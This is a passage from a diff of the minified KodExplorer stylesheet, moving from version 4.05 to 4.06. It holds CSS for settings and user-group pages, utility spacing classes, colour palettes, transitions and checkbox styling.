#ccc;overflow-y:auto;height:250px;}body.setting-page .select-parent-content .ztree .sub-menu,body.setting-page .select-parent-content .ztree .curSelectedNode .sub-menu{opacity:0.01;filter:alpha(opacity=1);}#body .system-content{position:absolute;border:1px solid #ddd;box-shadow:0 0 5px #ddd;bottom:10px;right:30px;top:38px;left:0px;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}#body .system-content .group-title-span{text-decoration:none;color:#428bca;}#body .system-content .left-frame{position:absolute;bottom:0px;top:0px;overflow:auto;width:180px;background:#FEFEFF;border-right:1px solid #ddd;}#body .system-content .left-frame .left-header{position:fixed;}#body .system-content .left-frame .left-header .tab{width:90px;margin-left:-1px;text-align:center;float:left;height:30px;cursor:pointer;line-height:30px;border:1px solid #d2d2d2;border-top:none;border-right:none;background:#DAE9FD;}#body .system-content .left-frame .left-header .tab.this{border-color:1px solid #FEFEFF;border-bottom:none;color:#555;background:#FEFEFF;font-weight:800;}#body .system-content .left-frame .left-content{margin-top:35px;}#body .system-content .left-frame .left-content .role-box{padding:10px 10px;}#body .system-content .left-frame .left-content .role-box ul{list-style:none;}#body .system-content .left-frame .left-content .role-box ul li.role-cell{border-radius:3px;height:30px;line-height:30px;padding-left:20px;margin-bottom:3px;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}#body .system-content .left-frame .left-content .role-box ul li.role-cell.role-cell-add{text-align:center;background:#eee;padding:0;color:#666;}#body .system-content .left-frame .left-content .role-box ul li.role-cell:hover{background:#eee;}#body .system-content .left-frame .left-content .role-box ul li.role-cell.select,#body .system-content .left-frame .left-content .role-box ul li.role-cell.select.role-cell-add{background:#63acff;color:#fff;}#body .system-content .left-frame .left-content .role-box ul li.role-cell .sub-menu{float:right;line-height:30px;height:30px;width:30px;text-align:center;}#body .system-content .left-frame .left-content .ztree li a{border-radius:3px;}#body .system-content .left-frame .left-content .ztree li a.hover{border:1px solid #eee;}#body .system-content .left-frame .left-content .ztree li a.curSelectedNode,#body .system-content .left-frame .left-content .ztree li a.curSelectedNode.hover{color:#fff;}#body .system-content .left-frame .left-content .group-role-btn a{text-align:center;display:block;background:#def;margin:5px 10px;padding:15px 0;border-radius:2px;}#body .system-content .right-frame{position:absolute;bottom:0px;top:0px;left:175px;right:0px;overflow:auto;padding:10px 10px 10px 20px;}#body .system-content .right-frame .group-title{font-size:25px;padding:8px 0;}#body .system-content .right-frame .group-title .group-title-span{border-bottom:2px solid;padding-bottom:3px;}#body .system-content .right-frame .group-title .group-size{position:absolute;margin-left:10px;border-radius:2px;font-size:12px;background-color:#f6f6f6;margin-top:5px;padding:6px 10px 0px;}#body .system-content .right-frame .user-toolbar{background:#eee;border-radius:3px;padding:7px 0px;margin:10px 0px;}#body .system-content .right-frame .user-toolbar .dropdown-menu{min-width:100px;}#body .system-content .right-frame .user-list table{border:none;width:100%;border-top:1px solid #ddd;border-bottom:1px solid #ddd;}#body .system-content .right-frame .user-list table tr{background:#fff;border:none;border-bottom:1px solid #eee;color:#666;}#body .system-content .right-frame .user-list table tr.title,#body .system-content .right-frame .user-list table tr.title:hover{background:#fafafa;border-top:1px solid #ddd;font-size:1em;color:#666;}#body .system-content .right-frame .user-list table tr:hover,#body .system-content .right-frame .user-list table tr.selected{background:#fff9ed;cursor:default;}#body .system-content .right-frame .user-list table tr.unuse{opacity:0.3;filter:alpha(opacity=30);}#body .system-content .right-frame .user-list table tr td{height:30px;line-height:30px;padding:0;border-right:none;width:auto;}#body .system-content .right-frame .user-list table tr td .space-info-bar{height:25px;}#body .system-content .right-frame .user-list table tr td .space-process{margin-top:6px;margin-bottom:-6px;}#body .system-content .right-frame .user-list table tr td .space-info{width:110px;overflow:hidden;}#body .system-content .right-frame .user-list table tr td.select{width:30px;padding-left:10px;}#body .system-content .right-frame .user-list table tr td.select input{position:relative;}#body .system-content .right-frame .user-list table tr td.select input:focus{box-shadow:none;}#body .system-content .right-frame .user-list table tr td.select:hover{background:#f6f6f6;}#body .system-content .right-frame .user-list table tr td.name{min-width:95px;}#body .system-content .right-frame .user-list table tr td.name a{border-bottom:1px solid;padding:2px;}#body .system-content .right-frame .user-list table tr td.role{width:90px;}#body .system-content .right-frame .user-list table tr td.space{width:120px;}#body .system-content .right-frame .user-list table tr td.group{width:auto;}#body .system-content .right-frame .user-list table tr td.action{width:auto;}#body .system-content .right-frame .user-list table tr td .label-small{font-size:10px;font-style:italic;color:#698ebf;background:#E9F3F9;padding:1px;border-radius:2px;}body.setting-page .select-user-group{padding:20px;font-size:1em;}body.setting-page .select-user-group .title-info .title{display:block;width:210px;float:left;padding-bottom:10px;}body.setting-page .select-user-group .title-info .title-right{margin-left:50px;}body.setting-page .select-user-group .right-content,body.setting-page .select-user-group .center-action,body.setting-page .select-user-group .left-content{border:1px solid #eee;float:left;width:235px;height:300px;}body.setting-page .select-user-group .right-content,body.setting-page .select-user-group .left-content{overflow-y:auto;}body.setting-page .select-user-group .left-content{margin:0px !important;padding:0;}body.setting-page .select-user-group .center-action{width:25px;border:none;}body.setting-page .select-user-group .center-action i{width:30px;height:30px;display:block;margin-top:150px;font-size:22px;color:#999;text-align:center;}body.setting-page .select-user-group .select-group-right{padding:0;list-style:none;}body.setting-page .select-user-group .select-group-right .group-self{height:30px;line-height:30px;border-radius:2px;}body.setting-page .select-user-group .select-group-right .group-self:hover{background:#def;}body.setting-page .select-user-group .select-group-right .group-self .title{color:#1e5494;padding-left:5px;}body.setting-page .select-user-group .select-group-right .group-self .icon-group{padding-right:10px;}body.setting-page .select-user-group .select-group-right .group-self .remove{float:right;cursor:pointer;height:30px;line-height:30px;width:22px;font-size:1.25em;text-align:center;color:#aaa;}body.setting-page .select-user-group .select-group-right .group-self .remove:hover{color:#f33;}body.setting-page .select-user-group .select-group-right .select-drop-menu .dropdown-menu li{padding-left:1em;font-size:13px;height:26px;line-height:24px;cursor:pointer;}body.setting-page .select-user-group .select-group-right .select-drop-menu .dropdown-menu li.selected{background:#337ab7;color:#fff;}body.setting-page .select-user-group .select-group-right .select-drop-menu .dropdown-menu li.selected:hover{background:#337ab7;color:#fff;}body.setting-page .select-user-group .select-group-right .select-drop-menu .dropdown-menu li:hover{background:#def;color:#337ab7;}body.setting-page .select-user-group #user-group-select.ztree .group-select-box{color:#fff;font-size:12px;border-radius:2px;width:14px;height:14px;line-height:14px;text-align:center;margin-top:4px;margin-right:4px;padding:0;position:absolute;right:0px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}body.setting-page .select-user-group #user-group-select.ztree .group-select-box:before{content:"\f";}body.setting-page .select-user-group #user-group-select.ztree a:hover .group-select-box{border:1px solid #3B99FC;}body.setting-page .select-user-group #user-group-select.ztree a.this .group-select-box{border:1px solid #3B99FC;background:#3B99FC;}body.setting-page .select-user-group #user-group-select.ztree a.this .group-select-box:before{content:"\f00c";color:#fff;}body.setting-page .select-user-group .select-drop-menu{margin-top:2px;float:right;}body.setting-page .select-user-group .select-drop-menu .btn{padding:0px 0.5em;margin-top:3px;font-weight:400;}body .group-role-setting{position:relative;width:100%;height:100%;}body .group-role-setting .content-info{position:absolute;bottom:10px;right:10px;top:10px;left:10px;box-shadow:0 0 3px #ccc;border-radius:2px;}body .group-role-setting .form-row{margin-bottom:5px;width:100%;}body .group-role-setting .form-row:after{clear:both;}body .group-role-setting .form-row.line{border-bottom:1px solid #ddd;margin-bottom:5px;}body .group-role-setting .form-row label{margin-right:20px;}body .group-role-setting .form-row input[type='checkbox']{display:inline-block;width:20px !important;}body .group-role-setting .form-row input[type='text'],body .group-role-setting .form-row input[type='password']{display:inline-block;margin-right:10px;height:30px;width:150px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;color:#444;border-radius:3px;padding-left:10px;}body .group-role-setting .form-row input[type='text']:focus,body .group-role-setting .form-row input[type='password']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}body .group-role-setting .form-row .setting-title{float:left;width:70px;height:30px;padding-top:5px;}body .group-role-setting .form-row .setting-content{position:relative;}body .group-role-setting .form-row .dropdown-menu{left:70px;right:auto;margin-top:5px;}body .group-role-setting .form-row .dropdown-menu:before{right:auto;left:9px;}body .group-role-setting .form-row .dropdown-menu:after{right:auto;left:10px;}body .group-role-setting .form-row .item.item-main{background:rgba(0,0,0,0.05);border-radius:4px;height:25px;line-height:25px;}body .group-role-setting .form-row .group-role-check{background:#f4fbff;border:1px solid #c3e1ff;top:5px;padding:5px;margin-left:70px;border-radius:3px;}body .group-role-setting .form-row .group-role-check .item label{display:block;height:25px;line-height:25px;padding:0px 4px;margin:1px 0;position:relative;top:-5px;}body .group-role-setting .form-row .group-role-check .item label span,body .group-role-setting .form-row .group-role-check .item label i{position:relative;top:5px;}body .group-role-setting .form-row .group-role-check .item:hover{color:#2196F3;background:#def;border-radius:4px;}body .group-role-setting .form-row .group-role-check .content{margin-left:32px;margin-bottom:10px;}body .group-role-setting .form-row-submit{background:#eee;margin:10px 0 10px 0;border-top:1px solid #ddd;height:60px;width:100%;}body .group-role-setting .form-row-submit .setting-content{margin:10px;}body .group-role-setting .form-row-submit .btn{padding:4px 2em;margin-left:10px;}body .group-role-setting .form-row-submit .btn.btn-remove{float:right;color:#666;background:none;}body .group-role-setting .form-row-submit .save{width:60px;}body .group-role-setting .left-content{position:absolute;bottom:0px;top:0px;overflow:auto;width:160px;padding:10px;border-right:1px solid #ddd;}body .group-role-setting .left-content .role-cell{color:#444;display:block;text-decoration:none;border-radius:3px;height:30px;line-height:30px;padding-left:20px;margin-bottom:3px;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}body .group-role-setting .left-content .role-cell.role-cell-add{text-align:center;background:#eee;padding:0;color:#666;}body .group-role-setting .left-content .role-cell:hover{background:#eee;}body .group-role-setting .left-content .role-cell.select,body .group-role-setting .left-content .role-cell.select.role-cell-add{background:#63acff;color:#fff;}body .group-role-setting .left-content .role-cell .sub-menu{float:right;line-height:30px;height:30px;width:30px;text-align:center;}body .group-role-setting .right-content{position:absolute;bottom:0px;top:0px;left:180px;right:0px;overflow:auto;} -/* ver 4.05(2017-08-26) [build 1503738070.2797] */ \ No newline at end of file +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100995.1393] */ +body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s 